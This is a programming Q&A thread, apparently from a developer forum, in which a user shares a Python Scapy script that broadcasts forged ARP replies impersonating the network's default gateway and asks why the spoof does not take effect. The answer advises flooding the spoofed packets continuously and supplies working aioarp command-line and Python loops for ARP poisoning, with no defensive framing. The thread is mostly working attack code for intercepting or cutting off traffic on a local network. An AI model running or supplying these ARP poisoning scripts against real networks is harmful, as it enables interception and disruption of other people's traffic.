# Write ARP spoofing correctly

Tags: python, scapy, arp

The ARP spoofing that I wrote does not work even that when I am sniffing the packets is seems like every thing should work.

I wrote a simple ARP spoofing that tells every one in the Sub net that I am the default getaway.
Here is my code:

```py
from scapy.all import *
import sys 

DEFULT_GETAWAY = "192.168.1.1"
MY_MAC = "30:24:30:8F:B4:64"
def main():

    while(1):
        pkt = send(ARP(op=ARP.is_at, psrc=DEFULT_GETAWAY, pdst="255.255.255.255", hwsrc=MY_MAC, hwdst="ff:ff:ff:ff:ff:ff"))

if __name__ == "__main__" :
    main()
```

I am expecting that when I am trying to access the internet from my phone(that connected to the router) it will not work but it does.

wire shark result:
`192.168.1.1 is at 30:24:30:8f:b4:64` (in sniffing it looks like every thing is working).

Comment: How do you send this packet and to who? Do you expect to poison the arp table of your phone or your router?

Answer (score -1):

When a system attempts to access an invalid mac address and fails, some systems send an ARP request to the router to obtain the proper mac address for that IP, therefore you should spam with your ARP spoofing packets rather than sending just one.

You can use the python llibrary [aioarp](https://github.com/karosis88/aioarp) to make such requests automatically.

```bash
$ aioarp spoof 0.0.0.0 192.168.0.1 11:11:11:11:11:11 --seconds 10
ARP poisoning has begun. [2023-07-09 00:55:16.060988]
The ARP poisoning has ended. [2023-07-09 00:55:26.070346]
```

Or in the code...

```py
import aioarp

packet = aioarp.build_arp_packet('0.0.0.0')
packet.sender_ip = '192.168.10.1'
packet.sender_mac = '11:11:11:11:11:11'
packet.opcode = aioarp.Opcode.response

while True:
    aioarp.sync_send_arp(packet, wait_response=False)
```